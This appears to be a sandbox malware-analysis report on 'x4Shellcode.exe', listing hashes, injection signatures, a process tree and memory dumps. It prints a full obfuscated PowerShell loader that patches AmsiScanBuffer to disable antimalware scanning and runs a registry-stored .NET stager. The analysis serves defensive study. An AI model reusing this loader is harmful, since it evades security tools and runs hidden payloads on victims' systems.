c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8

Analysis

max time kernel
4s
max time network
8s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
03/07/2024, 18:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

x4Shellcode.exe
Size

164KB
MD5

8a7bee2c8cec6ac50bc42fe03d3231e6
SHA1

ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
SHA256

c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
SHA512

34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5
SSDEEP

3072:CQpsC8VjDaGrEALtYwR4XiLqejJ3cW4biLsOLQGf1JgckNYhy0kJ:CQpsC8VjD9EAP46sBiHbeVW

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1048 created 612	1048	powershell.EXE	5

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1048 set thread context of 2224	1048	powershell.EXE	96

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1048	powershell.EXE
1048	powershell.EXE
1048	powershell.EXE
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe
2224	dllhost.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1048	powershell.EXE
Token: SeDebugPrivilege	1048	powershell.EXE
Token: SeDebugPrivilege	2224	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 2224	1048	powershell.EXE	96
PID 1048 wrote to memory of 2224	1048	powershell.EXE	96
PID 1048 wrote to memory of 2224	1048	powershell.EXE	96
PID 1048 wrote to memory of 2224	1048	powershell.EXE	96
PID 1048 wrote to memory of 2224	1048	powershell.EXE	96
PID 1048 wrote to memory of 2224	1048	powershell.EXE	96
PID 1048 wrote to memory of 2224	1048	powershell.EXE	96
PID 1048 wrote to memory of 2224	1048	powershell.EXE	96
PID 2224 wrote to memory of 612	2224	dllhost.exe	5
PID 2224 wrote to memory of 660	2224	dllhost.exe	7
PID 2224 wrote to memory of 948	2224	dllhost.exe	12
PID 2224 wrote to memory of 1012	2224	dllhost.exe	13
PID 2224 wrote to memory of 388	2224	dllhost.exe	14
PID 2224 wrote to memory of 1004	2224	dllhost.exe	15
PID 2224 wrote to memory of 1108	2224	dllhost.exe	17
PID 2224 wrote to memory of 1120	2224	dllhost.exe	18
PID 2224 wrote to memory of 1148	2224	dllhost.exe	19
PID 2224 wrote to memory of 1212	2224	dllhost.exe	20
PID 2224 wrote to memory of 1252	2224	dllhost.exe	21
PID 2224 wrote to memory of 1292	2224	dllhost.exe	22
PID 2224 wrote to memory of 1324	2224	dllhost.exe	23
PID 2224 wrote to memory of 1424	2224	dllhost.exe	24
PID 2224 wrote to memory of 1432	2224	dllhost.exe	25
PID 2224 wrote to memory of 1588	2224	dllhost.exe	26
PID 2224 wrote to memory of 1600	2224	dllhost.exe	27
PID 2224 wrote to memory of 1624	2224	dllhost.exe	28
PID 2224 wrote to memory of 1708	2224	dllhost.exe	29
PID 2224 wrote to memory of 1740	2224	dllhost.exe	30
PID 2224 wrote to memory of 1748	2224	dllhost.exe	31
PID 2224 wrote to memory of 1844	2224	dllhost.exe	32
PID 2224 wrote to memory of 1940	2224	dllhost.exe	33
PID 2224 wrote to memory of 1944	2224	dllhost.exe	34
PID 2224 wrote to memory of 1996	2224	dllhost.exe	35
PID 2224 wrote to memory of 1348	2224	dllhost.exe	36
PID 2224 wrote to memory of 1736	2224	dllhost.exe	37
PID 2224 wrote to memory of 2112	2224	dllhost.exe	38
PID 2224 wrote to memory of 2252	2224	dllhost.exe	40
PID 2224 wrote to memory of 2272	2224	dllhost.exe	41
PID 2224 wrote to memory of 2504	2224	dllhost.exe	42
PID 2224 wrote to memory of 2524	2224	dllhost.exe	43
PID 2224 wrote to memory of 2532	2224	dllhost.exe	44
PID 2224 wrote to memory of 2540	2224	dllhost.exe	45
PID 2224 wrote to memory of 2748	2224	dllhost.exe	46
PID 2224 wrote to memory of 2776	2224	dllhost.exe	47
PID 2224 wrote to memory of 2796	2224	dllhost.exe	48
PID 2224 wrote to memory of 2816	2224	dllhost.exe	49
PID 2224 wrote to memory of 2840	2224	dllhost.exe	50
PID 2224 wrote to memory of 2852	2224	dllhost.exe	51
PID 2224 wrote to memory of 2900	2224	dllhost.exe	52
PID 2224 wrote to memory of 3068	2224	dllhost.exe	53
PID 2224 wrote to memory of 3368	2224	dllhost.exe	55
PID 2224 wrote to memory of 3452	2224	dllhost.exe	56
PID 2224 wrote to memory of 3644	2224	dllhost.exe	57
PID 2224 wrote to memory of 3820	2224	dllhost.exe	58
PID 2224 wrote to memory of 856	2224	dllhost.exe	60
PID 2224 wrote to memory of 3320	2224	dllhost.exe	62
PID 2224 wrote to memory of 2124	2224	dllhost.exe	64
PID 2224 wrote to memory of 4864	2224	dllhost.exe	67
PID 2224 wrote to memory of 4752	2224	dllhost.exe	68
PID 2224 wrote to memory of 4444	2224	dllhost.exe	69
PID 2224 wrote to memory of 2052	2224	dllhost.exe	70
PID 2224 wrote to memory of 1780	2224	dllhost.exe	71
PID 2224 wrote to memory of 4516	2224	dllhost.exe	72
PID 2224 wrote to memory of 2488	2224	dllhost.exe	73

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1012
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{92e0e012-e59b-4992-9b5d-3f22aed5cd59}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2224

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:388

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1148
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DVGeCATNNIrH{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wdepsVVoNfKxdR,[Parameter(Position=1)][Type]$SABlRGltqP)$LZzvFHsANJw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+''+'y'+''+[Char](77)+'odu'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+'y'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'te'+'T'+''+[Char](121)+''+'p'+'e',''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+'P'+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+''+','+'S'+'e'+'a'+'l'+'e'+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+'ut'+[Char](111)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$LZzvFHsANJw.DefineConstructor(''+'R'+'T'+[Char](83)+''+'p'+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+'a'+''+'m'+''+[Char](101)+','+[Char](72)+'ide'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+''+'l'+'ic',[Reflection.CallingConventions]::Standard,$wdepsVVoNfKxdR).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$LZzvFHsANJw.DefineMethod(''+'I'+'n'+[Char](118)+'oke',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'lot,'+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$SABlRGltqP,$wdepsVVoNfKxdR).SetImplementationFlags('Ru'+'n'+''+'t'+''+'i'+'me,'+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $LZzvFHsANJw.CreateType();}$nsAVHApTTXQzh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+'e'+'N'+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+'hods');$aMQjZEzmyCMcTL=$nsAVHApTTXQzh.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+'r'+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'bli'+[Char](99)+','+[Char](83)+''+[Char](116)+'at'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WypQUjioPihwsdHbjgH=DVGeCATNNIrH @([String])([IntPtr]);$iSFuYpytxdGezGazJQZQan=DVGeCATNNIrH @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZlcCgARQGRm=$nsAVHApTTXQzh.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+'rne'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$uIWojVOPtKdbfO=$aMQjZEzmyCMcTL.Invoke($Null,@([Object]$ZlcCgARQGRm,[Object]('L'+'o'+''+'a'+''+'d'+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$NXGZlywtvTPGBZscB=$aMQjZEzmyCMcTL.Invoke($Null,@([Object]$ZlcCgARQGRm,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+'t')));$lDIHrhu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uIWojVOPtKdbfO,$WypQUjioPihwsdHbjgH).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+'dll');$NTVGMNqxOhWvpRJpf=$aMQjZEzmyCMcTL.Invoke($Null,@([Object]$lDIHrhu,[Object](''+[Char](65)+'ms'+'i'+''+'S'+'c'+'a'+''+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$BPYSmzyyVi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NXGZlywtvTPGBZscB,$iSFuYpytxdGezGazJQZQan).Invoke($NTVGMNqxOhWvpRJpf,[uint32]8,4,[ref]$BPYSmzyyVi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NTVGMNqxOhWvpRJpf,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NXGZlywtvTPGBZscB,$iSFuYpytxdGezGazJQZQan).Invoke($NTVGMNqxOhWvpRJpf,[uint32]8,0x20,[ref]$BPYSmzyyVi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'x'+''+[Char](52)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1048
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1020

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1432
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1600

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1736

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2252

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2796

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2900

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3368

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3452
- C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
  "C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
  2⤵
  PID:2888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3644

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3820

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3320

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2124

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4444

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4516

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2488

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:1080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=125.0.2535.92 --initial-client-data=0x23c,0x240,0x244,0x238,0x260,0x7ffa27194ef8,0x7ffa27194f04,0x7ffa27194f10
  2⤵
  PID:4728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1888,i,7869973516895866428,11647313872437892197,262144 --variations-seed-version --mojo-platform-channel-handle=2472 /prefetch:3
  2⤵
  PID:3612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4416,i,7869973516895866428,11647313872437892197,262144 --variations-seed-version --mojo-platform-channel-handle=3980 /prefetch:8
  2⤵
  PID:4632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:408

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:4400

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2500

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4840

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Temp\__PSScriptPolicyTest_4szu20hi.loc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/388-683-0x000002AE19EC0000-0x000002AE19EE6000-memory.dmp

Filesize
152KB

Download
memory/612-43-0x000001C0FD2C0000-0x000001C0FD2EC000-memory.dmp

Filesize
176KB

Download
memory/612-35-0x000001C0FD2C0000-0x000001C0FD2EC000-memory.dmp

Filesize
176KB

Download
memory/612-678-0x00007FFA4F38D000-0x00007FFA4F38E000-memory.dmp

Filesize
4KB

Download
memory/612-44-0x00007FFA0F370000-0x00007FFA0F380000-memory.dmp

Filesize
64KB

Download
memory/612-34-0x000001C0FD2C0000-0x000001C0FD2EC000-memory.dmp

Filesize
